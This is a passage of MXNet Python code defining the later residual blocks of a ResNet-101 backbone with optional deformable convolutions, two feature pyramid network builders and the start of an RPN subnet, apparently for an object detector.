bn4b14_branch2c = mx.symbol.BatchNorm(name='bn4b14_branch2c', data=res4b14_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b14_branch2c = bn4b14_branch2c
res4b14 = mx.symbol.broadcast_add(name='res4b14', *[res4b13_relu, scale4b14_branch2c])
res4b14_relu = mx.symbol.Activation(name='res4b14_relu', data=res4b14, act_type='relu')
res4b15_branch2a = mx.symbol.Convolution(name='res4b15_branch2a', data=res4b14_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b15_branch2a = mx.symbol.BatchNorm(name='bn4b15_branch2a', data=res4b15_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b15_branch2a = bn4b15_branch2a
res4b15_branch2a_relu = mx.symbol.Activation(name='res4b15_branch2a_relu', data=scale4b15_branch2a,
act_type='relu')
res4b15_branch2b = mx.symbol.Convolution(name='res4b15_branch2b', data=res4b15_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b15_branch2b = mx.symbol.BatchNorm(name='bn4b15_branch2b', data=res4b15_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b15_branch2b = bn4b15_branch2b
res4b15_branch2b_relu = mx.symbol.Activation(name='res4b15_branch2b_relu', data=scale4b15_branch2b,
act_type='relu')
res4b15_branch2c = mx.symbol.Convolution(name='res4b15_branch2c', data=res4b15_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b15_branch2c = mx.symbol.BatchNorm(name='bn4b15_branch2c', data=res4b15_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b15_branch2c = bn4b15_branch2c
res4b15 = mx.symbol.broadcast_add(name='res4b15', *[res4b14_relu, scale4b15_branch2c])
res4b15_relu = mx.symbol.Activation(name='res4b15_relu', data=res4b15, act_type='relu')
res4b16_branch2a = mx.symbol.Convolution(name='res4b16_branch2a', data=res4b15_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b16_branch2a = mx.symbol.BatchNorm(name='bn4b16_branch2a', data=res4b16_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b16_branch2a = bn4b16_branch2a
res4b16_branch2a_relu = mx.symbol.Activation(name='res4b16_branch2a_relu', data=scale4b16_branch2a,
act_type='relu')
res4b16_branch2b = mx.symbol.Convolution(name='res4b16_branch2b', data=res4b16_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b16_branch2b = mx.symbol.BatchNorm(name='bn4b16_branch2b', data=res4b16_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b16_branch2b = bn4b16_branch2b
res4b16_branch2b_relu = mx.symbol.Activation(name='res4b16_branch2b_relu', data=scale4b16_branch2b,
act_type='relu')
res4b16_branch2c = mx.symbol.Convolution(name='res4b16_branch2c', data=res4b16_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b16_branch2c = mx.symbol.BatchNorm(name='bn4b16_branch2c', data=res4b16_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b16_branch2c = bn4b16_branch2c
res4b16 = mx.symbol.broadcast_add(name='res4b16', *[res4b15_relu, scale4b16_branch2c])
res4b16_relu = mx.symbol.Activation(name='res4b16_relu', data=res4b16, act_type='relu')
res4b17_branch2a = mx.symbol.Convolution(name='res4b17_branch2a', data=res4b16_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b17_branch2a = mx.symbol.BatchNorm(name='bn4b17_branch2a', data=res4b17_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b17_branch2a = bn4b17_branch2a
res4b17_branch2a_relu = mx.symbol.Activation(name='res4b17_branch2a_relu', data=scale4b17_branch2a,
act_type='relu')
res4b17_branch2b = mx.symbol.Convolution(name='res4b17_branch2b', data=res4b17_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b17_branch2b = mx.symbol.BatchNorm(name='bn4b17_branch2b', data=res4b17_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b17_branch2b = bn4b17_branch2b
res4b17_branch2b_relu = mx.symbol.Activation(name='res4b17_branch2b_relu', data=scale4b17_branch2b,
act_type='relu')
res4b17_branch2c = mx.symbol.Convolution(name='res4b17_branch2c', data=res4b17_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b17_branch2c = mx.symbol.BatchNorm(name='bn4b17_branch2c', data=res4b17_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b17_branch2c = bn4b17_branch2c
res4b17 = mx.symbol.broadcast_add(name='res4b17', *[res4b16_relu, scale4b17_branch2c])
res4b17_relu = mx.symbol.Activation(name='res4b17_relu', data=res4b17, act_type='relu')
res4b18_branch2a = mx.symbol.Convolution(name='res4b18_branch2a', data=res4b17_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b18_branch2a = mx.symbol.BatchNorm(name='bn4b18_branch2a', data=res4b18_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b18_branch2a = bn4b18_branch2a
res4b18_branch2a_relu = mx.symbol.Activation(name='res4b18_branch2a_relu', data=scale4b18_branch2a,
act_type='relu')
res4b18_branch2b = mx.symbol.Convolution(name='res4b18_branch2b', data=res4b18_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b18_branch2b = mx.symbol.BatchNorm(name='bn4b18_branch2b', data=res4b18_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b18_branch2b = bn4b18_branch2b
res4b18_branch2b_relu = mx.symbol.Activation(name='res4b18_branch2b_relu', data=scale4b18_branch2b,
act_type='relu')
res4b18_branch2c = mx.symbol.Convolution(name='res4b18_branch2c', data=res4b18_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b18_branch2c = mx.symbol.BatchNorm(name='bn4b18_branch2c', data=res4b18_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b18_branch2c = bn4b18_branch2c
res4b18 = mx.symbol.broadcast_add(name='res4b18', *[res4b17_relu, scale4b18_branch2c])
res4b18_relu = mx.symbol.Activation(name='res4b18_relu', data=res4b18, act_type='relu')
res4b19_branch2a = mx.symbol.Convolution(name='res4b19_branch2a', data=res4b18_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b19_branch2a = mx.symbol.BatchNorm(name='bn4b19_branch2a', data=res4b19_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b19_branch2a = bn4b19_branch2a
res4b19_branch2a_relu = mx.symbol.Activation(name='res4b19_branch2a_relu', data=scale4b19_branch2a,
act_type='relu')
res4b19_branch2b = mx.symbol.Convolution(name='res4b19_branch2b', data=res4b19_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b19_branch2b = mx.symbol.BatchNorm(name='bn4b19_branch2b', data=res4b19_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b19_branch2b = bn4b19_branch2b
res4b19_branch2b_relu = mx.symbol.Activation(name='res4b19_branch2b_relu', data=scale4b19_branch2b,
act_type='relu')
res4b19_branch2c = mx.symbol.Convolution(name='res4b19_branch2c', data=res4b19_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b19_branch2c = mx.symbol.BatchNorm(name='bn4b19_branch2c', data=res4b19_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b19_branch2c = bn4b19_branch2c
res4b19 = mx.symbol.broadcast_add(name='res4b19', *[res4b18_relu, scale4b19_branch2c])
res4b19_relu = mx.symbol.Activation(name='res4b19_relu', data=res4b19, act_type='relu')
res4b20_branch2a = mx.symbol.Convolution(name='res4b20_branch2a', data=res4b19_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b20_branch2a = mx.symbol.BatchNorm(name='bn4b20_branch2a', data=res4b20_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b20_branch2a = bn4b20_branch2a
res4b20_branch2a_relu = mx.symbol.Activation(name='res4b20_branch2a_relu', data=scale4b20_branch2a,
act_type='relu')
res4b20_branch2b = mx.symbol.Convolution(name='res4b20_branch2b', data=res4b20_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b20_branch2b = mx.symbol.BatchNorm(name='bn4b20_branch2b', data=res4b20_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b20_branch2b = bn4b20_branch2b
res4b20_branch2b_relu = mx.symbol.Activation(name='res4b20_branch2b_relu', data=scale4b20_branch2b,
act_type='relu')
res4b20_branch2c = mx.symbol.Convolution(name='res4b20_branch2c', data=res4b20_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b20_branch2c = mx.symbol.BatchNorm(name='bn4b20_branch2c', data=res4b20_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b20_branch2c = bn4b20_branch2c
res4b20 = mx.symbol.broadcast_add(name='res4b20', *[res4b19_relu, scale4b20_branch2c])
res4b20_relu = mx.symbol.Activation(name='res4b20_relu', data=res4b20, act_type='relu')
res4b21_branch2a = mx.symbol.Convolution(name='res4b21_branch2a', data=res4b20_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b21_branch2a = mx.symbol.BatchNorm(name='bn4b21_branch2a', data=res4b21_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b21_branch2a = bn4b21_branch2a
res4b21_branch2a_relu = mx.symbol.Activation(name='res4b21_branch2a_relu', data=scale4b21_branch2a,
act_type='relu')
res4b21_branch2b = mx.symbol.Convolution(name='res4b21_branch2b', data=res4b21_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b21_branch2b = mx.symbol.BatchNorm(name='bn4b21_branch2b', data=res4b21_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b21_branch2b = bn4b21_branch2b
res4b21_branch2b_relu = mx.symbol.Activation(name='res4b21_branch2b_relu', data=scale4b21_branch2b,
act_type='relu')
res4b21_branch2c = mx.symbol.Convolution(name='res4b21_branch2c', data=res4b21_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b21_branch2c = mx.symbol.BatchNorm(name='bn4b21_branch2c', data=res4b21_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b21_branch2c = bn4b21_branch2c
res4b21 = mx.symbol.broadcast_add(name='res4b21', *[res4b20_relu, scale4b21_branch2c])
res4b21_relu = mx.symbol.Activation(name='res4b21_relu', data=res4b21, act_type='relu')
res4b22_branch2a = mx.symbol.Convolution(name='res4b22_branch2a', data=res4b21_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b22_branch2a = mx.symbol.BatchNorm(name='bn4b22_branch2a', data=res4b22_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b22_branch2a = bn4b22_branch2a
res4b22_branch2a_relu = mx.symbol.Activation(name='res4b22_branch2a_relu', data=scale4b22_branch2a,
act_type='relu')
if with_dpyramid:
res4b22_branch2b_offset = mx.symbol.Convolution(name='res4b22_branch2b_offset', data=res4b22_branch2a_relu,
num_filter=72, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
res4b22_branch2b = mx.contrib.symbol.DeformableConvolution(name='res4b22_branch2b', data=res4b22_branch2a_relu,
offset=res4b22_branch2b_offset,
num_filter=256, pad=(1, 1), kernel=(3, 3),
num_deformable_group=4,
stride=(1, 1), no_bias=True)
else:
res4b22_branch2b = mx.symbol.Convolution(name='res4b22_branch2b', data=res4b22_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b22_branch2b = mx.symbol.BatchNorm(name='bn4b22_branch2b', data=res4b22_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b22_branch2b = bn4b22_branch2b
res4b22_branch2b_relu = mx.symbol.Activation(name='res4b22_branch2b_relu', data=scale4b22_branch2b,
act_type='relu')
res4b22_branch2c = mx.symbol.Convolution(name='res4b22_branch2c', data=res4b22_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b22_branch2c = mx.symbol.BatchNorm(name='bn4b22_branch2c', data=res4b22_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b22_branch2c = bn4b22_branch2c
res4b22 = mx.symbol.broadcast_add(name='res4b22', *[res4b21_relu, scale4b22_branch2c])
res4b22_relu = mx.symbol.Activation(name='res4b22_relu', data=res4b22, act_type='relu')
if with_dilated:
res5_stride = (1, 1)
res5_dilate = (2, 2)
else:
res5_stride = (2, 2)
res5_dilate = (1, 1)
# res5a-bottleneck
res5a_branch2a = mx.symbol.Convolution(name='res5a_branch2a', data=res4b22_relu, num_filter=512, pad=(0, 0), kernel=(1, 1), stride=res5_stride, no_bias=True)
bn5a_branch2a = mx.symbol.BatchNorm(name='bn5a_branch2a', data=res5a_branch2a, use_global_stats=True, fix_gamma=False, eps=eps)
scale5a_branch2a = bn5a_branch2a
res5a_branch2a_relu = mx.symbol.Activation(name='res5a_branch2a_relu', data=scale5a_branch2a, act_type='relu')
if with_dconv:
res5a_branch2b_offset = mx.symbol.Convolution(name='res5a_branch2b_offset', data=res5a_branch2a_relu, num_filter=72, pad=res5_dilate, kernel=(3, 3), dilate=res5_dilate)
res5a_branch2b = mx.contrib.symbol.DeformableConvolution(name='res5a_branch2b', data=res5a_branch2a_relu, offset=res5a_branch2b_offset, num_filter=512,
pad=res5_dilate, kernel=(3, 3), num_deformable_group=4, stride=(1, 1), dilate=res5_dilate, no_bias=True)
else:
res5a_branch2b = mx.symbol.Convolution(name='res5a_branch2b', data=res5a_branch2a_relu, num_filter=512, pad=res5_dilate,
kernel=(3, 3), stride=(1, 1), dilate=res5_dilate, no_bias=True)
bn5a_branch2b = mx.symbol.BatchNorm(name='bn5a_branch2b', data=res5a_branch2b, use_global_stats=True, fix_gamma=False, eps=eps)
scale5a_branch2b = bn5a_branch2b
res5a_branch2b_relu = mx.symbol.Activation(name='res5a_branch2b_relu', data=scale5a_branch2b, act_type='relu')
res5a_branch2c = mx.symbol.Convolution(name='res5a_branch2c', data=res5a_branch2b_relu, num_filter=2048, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn5a_branch2c = mx.symbol.BatchNorm(name='bn5a_branch2c', data=res5a_branch2c, use_global_stats=True, fix_gamma=False, eps=eps)
scale5a_branch2c = bn5a_branch2c
# res5a-shortcut
res5a_branch1 = mx.symbol.Convolution(name='res5a_branch1', data=res4b22_relu, num_filter=2048, pad=(0, 0), kernel=(1, 1), stride=res5_stride, no_bias=True)
bn5a_branch1 = mx.symbol.BatchNorm(name='bn5a_branch1', data=res5a_branch1, use_global_stats=True, fix_gamma=False, eps=eps)
scale5a_branch1 = bn5a_branch1
res5a = mx.symbol.broadcast_add(name='res5a', *[scale5a_branch1, scale5a_branch2c])
res5a_relu = mx.symbol.Activation(name='res5a_relu', data=res5a, act_type='relu')
# res5b-bottleneck
res5b_branch2a = mx.symbol.Convolution(name='res5b_branch2a', data=res5a_relu, num_filter=512, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn5b_branch2a = mx.symbol.BatchNorm(name='bn5b_branch2a', data=res5b_branch2a, use_global_stats=True, fix_gamma=False, eps=eps)
scale5b_branch2a = bn5b_branch2a
res5b_branch2a_relu = mx.symbol.Activation(name='res5b_branch2a_relu', data=scale5b_branch2a, act_type='relu')
if with_dconv:
res5b_branch2b_offset = mx.symbol.Convolution(name='res5b_branch2b_offset', data=res5b_branch2a_relu, num_filter=72, pad=res5_dilate, kernel=(3, 3), dilate=res5_dilate)
res5b_branch2b = mx.contrib.symbol.DeformableConvolution(name='res5b_branch2b', data=res5b_branch2a_relu, offset=res5b_branch2b_offset, num_filter=512,
pad=res5_dilate, kernel=(3, 3), num_deformable_group=4, dilate=res5_dilate, no_bias=True)
else:
res5b_branch2b = mx.symbol.Convolution(name='res5b_branch2b', data=res5b_branch2a_relu, num_filter=512, pad=res5_dilate,
kernel=(3, 3), stride=(1, 1), dilate=res5_dilate, no_bias=True)
bn5b_branch2b = mx.symbol.BatchNorm(name='bn5b_branch2b', data=res5b_branch2b, use_global_stats=True, fix_gamma=False, eps=eps)
scale5b_branch2b = bn5b_branch2b
res5b_branch2b_relu = mx.symbol.Activation(name='res5b_branch2b_relu', data=scale5b_branch2b, act_type='relu')
res5b_branch2c = mx.symbol.Convolution(name='res5b_branch2c', data=res5b_branch2b_relu, num_filter=2048, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn5b_branch2c = mx.symbol.BatchNorm(name='bn5b_branch2c', data=res5b_branch2c, use_global_stats=True, fix_gamma=False, eps=eps)
scale5b_branch2c = bn5b_branch2c
# res5b-shortcut
res5b = mx.symbol.broadcast_add(name='res5b', *[res5a_relu, scale5b_branch2c])
res5b_relu = mx.symbol.Activation(name='res5b_relu', data=res5b, act_type='relu')
# res5c-bottleneck
res5c_branch2a = mx.symbol.Convolution(name='res5c_branch2a', data=res5b_relu, num_filter=512, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn5c_branch2a = mx.symbol.BatchNorm(name='bn5c_branch2a', data=res5c_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale5c_branch2a = bn5c_branch2a
res5c_branch2a_relu = mx.symbol.Activation(name='res5c_branch2a_relu', data=scale5c_branch2a, act_type='relu')
if with_dconv:
res5c_branch2b_offset = mx.symbol.Convolution(name='res5c_branch2b_offset', data=res5c_branch2a_relu, num_filter=72, pad=res5_dilate, kernel=(3, 3), dilate=res5_dilate)
res5c_branch2b = mx.contrib.symbol.DeformableConvolution(name='res5c_branch2b', data=res5c_branch2a_relu, offset=res5c_branch2b_offset, num_filter=512,
pad=res5_dilate, kernel=(3, 3), num_deformable_group=4, dilate=res5_dilate, no_bias=True)
else:
res5c_branch2b = mx.symbol.Convolution(name='res5c_branch2b', data=res5c_branch2a_relu, num_filter=512, pad=res5_dilate,
kernel=(3, 3), stride=(1, 1), dilate=res5_dilate, no_bias=True)
bn5c_branch2b = mx.symbol.BatchNorm(name='bn5c_branch2b', data=res5c_branch2b, use_global_stats=True, fix_gamma=False, eps=eps)
scale5c_branch2b = bn5c_branch2b
res5c_branch2b_relu = mx.symbol.Activation(name='res5c_branch2b_relu', data=scale5c_branch2b, act_type='relu')
res5c_branch2c = mx.symbol.Convolution(name='res5c_branch2c', data=res5c_branch2b_relu, num_filter=2048, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn5c_branch2c = mx.symbol.BatchNorm(name='bn5c_branch2c', data=res5c_branch2c, use_global_stats=True, fix_gamma=False, eps=eps)
scale5c_branch2c = bn5c_branch2c
# res5c-shortcut
res5c = mx.symbol.broadcast_add(name='res5c', *[res5b_relu, scale5c_branch2c])
res5c_relu = mx.symbol.Activation(name='res5c_relu', data=res5c, act_type='relu')
return data, conv1_relu, res2c_relu, res3b3_relu, res4b22_relu, res5c_relu
def get_fpn_feature(self, c0, c1, c2, c3, c4, c5, feature_dim=256):
# lateral connection
fpn_p5_1x1 = mx.symbol.Convolution(data=c5, kernel=(1, 1), pad=(0, 0), stride=(1, 1), num_filter=feature_dim, name='fpn_p5_1x1')
fpn_p4_1x1 = mx.symbol.Convolution(data=c4, kernel=(1, 1), pad=(0, 0), stride=(1, 1), num_filter=feature_dim, name='fpn_p4_1x1')
fpn_p3_1x1 = mx.symbol.Convolution(data=c3, kernel=(1, 1), pad=(0, 0), stride=(1, 1), num_filter=feature_dim, name='fpn_p3_1x1')
fpn_p2_1x1 = mx.symbol.Convolution(data=c2, kernel=(1, 1), pad=(0, 0), stride=(1, 1), num_filter=feature_dim, name='fpn_p2_1x1')
fpn_p1_1x1 = mx.symbol.Convolution(data=c1, kernel=(1, 1), pad=(0, 0), stride=(1, 1), num_filter=feature_dim, name='fpn_p1_1x1')
fpn_p0_1x1 = mx.symbol.Convolution(data=c0, kernel=(1, 1), pad=(0, 0), stride=(1, 1), num_filter=feature_dim, name='fpn_p0_1x1')
# top-down connection
fpn_p5_upsample = mx.symbol.UpSampling(fpn_p5_1x1, scale=2, sample_type='nearest', name='fpn_p5_upsample')
fpn_p4_plus = mx.sym.ElementWiseSum(*[fpn_p5_upsample, fpn_p4_1x1], name='fpn_p4_sum')
fpn_p4_upsample = mx.symbol.UpSampling(fpn_p4_plus, scale=2, sample_type='nearest', name='fpn_p4_upsample')
fpn_p3_plus = mx.sym.ElementWiseSum(*[fpn_p4_upsample, fpn_p3_1x1], name='fpn_p3_sum')
fpn_p3_upsample = mx.symbol.UpSampling(fpn_p3_plus, scale=2, sample_type='nearest', name='fpn_p3_upsample')
fpn_p2_plus = mx.sym.ElementWiseSum(*[fpn_p3_upsample, fpn_p2_1x1], name='fpn_p2_sum')
fpn_p2_upsample = mx.symbol.UpSampling(fpn_p2_plus, scale=2, sample_type='nearest', name='fpn_p2_upsample')
fpn_p1_plus = mx.sym.ElementWiseSum(*[fpn_p2_upsample, fpn_p1_1x1], name='fpn_p1_sum')
fpn_p1_upsample = mx.symbol.UpSampling(fpn_p1_plus, scale=2, sample_type='nearest', name='fpn_p1_upsample')
fpn_p0_plus = mx.sym.ElementWiseSum(*[fpn_p1_upsample, fpn_p0_1x1], name='fpn_p0_sum')
# FPN feature
fpn_p6 = mx.sym.Convolution(data=c5, kernel=(3, 3), pad=(1, 1), stride=(2, 2), num_filter=feature_dim, name='fpn_p6')
'''
fpn_p5 = mx.symbol.Convolution(data=fpn_p5_1x1, kernel=(3, 3), pad=(1, 1), stride=(1, 1), num_filter=feature_dim, name='fpn_p5')
fpn_p4 = mx.symbol.Convolution(data=fpn_p4_plus, kernel=(3, 3), pad=(1, 1), stride=(1, 1), num_filter=feature_dim, name='fpn_p4')
fpn_p3 = mx.symbol.Convolution(data=fpn_p3_plus, kernel=(3, 3), pad=(1, 1), stride=(1, 1), num_filter=feature_dim, name='fpn_p3')
fpn_p2 = mx.symbol.Convolution(data=fpn_p2_plus, kernel=(3, 3), pad=(1, 1), stride=(1, 1), num_filter=feature_dim, name='fpn_p2')
fpn_p1 = mx.symbol.Convolution(data=fpn_p1_plus, kernel=(3, 3), pad=(1, 1), stride=(1, 1), num_filter=feature_dim, name='fpn_p1')
'''
fpn_p0 = mx.symbol.Convolution(data=fpn_p0_plus, kernel=(3, 3), pad=(1, 1), stride=(1, 1), num_filter=feature_dim, name='fpn_p0')
#return fpn_p0, fpn_p1, fpn_p2, fpn_p3, fpn_p4, fpn_p5, fpn_p6
return fpn_p0,fpn_p6
def get_fpn_feature1(self, c0, c1, c2, c3, c4, c5, feature_dim=128):
eps = 1e-5
# lateral connection
fpn_p5_1x1 = mx.symbol.Convolution(data=c5, kernel=(1, 1), pad=(0, 0), stride=(1, 1), num_filter=feature_dim, name='fpn_p5_1x1')
bn_fpn_p5_1x1 = mx.symbol.BatchNorm(name='bn_fpn_p5_1x1', data=fpn_p5_1x1, use_global_stats=True, fix_gamma=False, eps=eps)
bn_fpn_p5_1x1_relu = mx.symbol.Activation(name='bn_fpn_p5_1x1_relu', data=bn_fpn_p5_1x1, act_type='relu')
fpn_p4_1x1 = mx.symbol.Convolution(data=c4, kernel=(1, 1), pad=(0, 0), stride=(1, 1), num_filter=feature_dim, name='fpn_p4_1x1')
bn_fpn_p4_1x1 = mx.symbol.BatchNorm(name='bn_fpn_p4_1x1', data=fpn_p4_1x1, use_global_stats=True, fix_gamma=False, eps=eps)
bn_fpn_p4_1x1_relu = mx.symbol.Activation(name='bn_fpn_p4_1x1_relu', data=bn_fpn_p4_1x1, act_type='relu')
fpn_p3_1x1 = mx.symbol.Convolution(data=c3, kernel=(1, 1), pad=(0, 0), stride=(1, 1), num_filter=feature_dim, name='fpn_p3_1x1')
bn_fpn_p3_1x1 = mx.symbol.BatchNorm(name='bn_fpn_p3_1x1', data=fpn_p3_1x1, use_global_stats=True, fix_gamma=False, eps=eps)
bn_fpn_p3_1x1_relu = mx.symbol.Activation(name='bn_fpn_p3_1x1_relu', data=bn_fpn_p3_1x1, act_type='relu')
fpn_p2_1x1 = mx.symbol.Convolution(data=c2, kernel=(1, 1), pad=(0, 0), stride=(1, 1), num_filter=feature_dim, name='fpn_p2_1x1')
bn_fpn_p2_1x1 = mx.symbol.BatchNorm(name='bn_fpn_p2_1x1', data=fpn_p2_1x1, use_global_stats=True, fix_gamma=False, eps=eps)
bn_fpn_p2_1x1_relu = mx.symbol.Activation(name='bn_fpn_p2_1x1_relu', data=bn_fpn_p2_1x1, act_type='relu')
fpn_p1_1x1 = mx.symbol.Convolution(data=c1, kernel=(1, 1), pad=(0, 0), stride=(1, 1), num_filter=feature_dim, name='fpn_p1_1x1')
bn_fpn_p1_1x1 = mx.symbol.BatchNorm(name='bn_fpn_p1_1x1', data=fpn_p1_1x1, use_global_stats=True, fix_gamma=False, eps=eps)
bn_fpn_p1_1x1_relu = mx.symbol.Activation(name='bn_fpn_p1_1x1_relu', data=bn_fpn_p1_1x1, act_type='relu')
fpn_p0_1x1 = mx.symbol.Convolution(data=c0, kernel=(1, 1), pad=(0, 0), stride=(1, 1), num_filter=feature_dim, name='fpn_p0_1x1')
bn_fpn_p0_1x1 = mx.symbol.BatchNorm(name='bn_fpn_p0_1x1', data=fpn_p0_1x1, use_global_stats=True, fix_gamma=False, eps=eps)
bn_fpn_p0_1x1_relu = mx.symbol.Activation(name='bn_fpn_p0_1x1_relu', data=bn_fpn_p0_1x1, act_type='relu')
# top-down connection
_kernel=(4,4)
_stride=(2,2)
_pad=(1,1)
fpn_p5_deconv = mx.symbol.Deconvolution(bn_fpn_p5_1x1_relu,kernel=_kernel, stride=_stride,pad=_pad,num_filter=feature_dim,name='fpn_p5_deconv')
fpn_p4_plus = mx.sym.ElementWiseSum(*[fpn_p5_deconv, bn_fpn_p4_1x1_relu], name='fpn_p4_sum')
fpn_p4_deconv = mx.symbol.Deconvolution(fpn_p4_plus,kernel=_kernel, stride=_stride,pad=_pad,num_filter=feature_dim,name='fpn_p4_deconv')
fpn_p3_plus = mx.sym.ElementWiseSum(*[fpn_p4_deconv, bn_fpn_p3_1x1_relu], name='fpn_p3_sum')
fpn_p3_deconv = mx.symbol.Deconvolution(fpn_p3_plus,kernel=_kernel, stride=_stride,pad=_pad,num_filter=feature_dim,name='fpn_p3_deconv')
fpn_p2_plus = mx.sym.ElementWiseSum(*[fpn_p3_deconv, bn_fpn_p2_1x1_relu], name='fpn_p2_sum')
fpn_p2_deconv = mx.symbol.Deconvolution(fpn_p2_plus,kernel=_kernel, stride=_stride,pad=_pad,num_filter=feature_dim,name='fpn_p2_deconv')
fpn_p1_plus = mx.sym.ElementWiseSum(*[fpn_p2_deconv, bn_fpn_p1_1x1_relu], name='fpn_p1_sum')
fpn_p1_deconv = mx.symbol.Deconvolution(fpn_p1_plus,kernel=_kernel, stride=_stride,pad=_pad,num_filter=feature_dim,name='fpn_p1_deconv')
fpn_p0_plus = mx.sym.ElementWiseSum(*[fpn_p1_deconv, bn_fpn_p0_1x1_relu], name='fpn_p0_sum')
# FPN feature
fpn_p6 = mx.sym.Convolution(data=c5, kernel=(3, 3), pad=(1, 1), stride=(2, 2), num_filter=feature_dim, name='fpn_p6')
'''
fpn_p5 = mx.symbol.Convolution(data=fpn_p5_1x1, kernel=(3, 3), pad=(1, 1), stride=(1, 1), num_filter=feature_dim, name='fpn_p5')
fpn_p4 = mx.symbol.Convolution(data=fpn_p4_plus, kernel=(3, 3), pad=(1, 1), stride=(1, 1), num_filter=feature_dim, name='fpn_p4')
fpn_p3 = mx.symbol.Convolution(data=fpn_p3_plus, kernel=(3, 3), pad=(1, 1), stride=(1, 1), num_filter=feature_dim, name='fpn_p3')
fpn_p2 = mx.symbol.Convolution(data=fpn_p2_plus, kernel=(3, 3), pad=(1, 1), stride=(1, 1), num_filter=feature_dim, name='fpn_p2')
fpn_p1 = mx.symbol.Convolution(data=fpn_p1_plus, kernel=(3, 3), pad=(1, 1), stride=(1, 1), num_filter=feature_dim, name='fpn_p1')
'''
fpn_p0 = mx.symbol.Convolution(data=fpn_p0_plus, kernel=(3, 3), pad=(1, 1), stride=(1, 1), num_filter=feature_dim, name='fpn_p0')
return fpn_p0,fpn_p6#,fpn_p5#, fpn_p1, fpn_p2, fpn_p3, fpn_p4, fpn_p5,
def get_rpn_subnet(self, data, num_anchors, suffix):
rpn_conv = mx.sym.Convolution(data=data, kernel=(3, 3), pad=(1, 1), num_filter=128, name='rpn_conv_' + suffix,
weight=self.shared_param_dict['rpn_conv_weight'], bias=self.shared_param_dict['rpn_conv_bias'])
rpn_relu = mx.sym.Activation(data=rpn_conv, act_type='relu', name='rpn_relu_' + suffix)
rpn_cls_score = mx.sym.Convolution(data=rpn_relu, kernel=(1, 1), pad=(0, 0), num_filter=2 * num_anchors, name='rpn_cls_score_' + suffix,
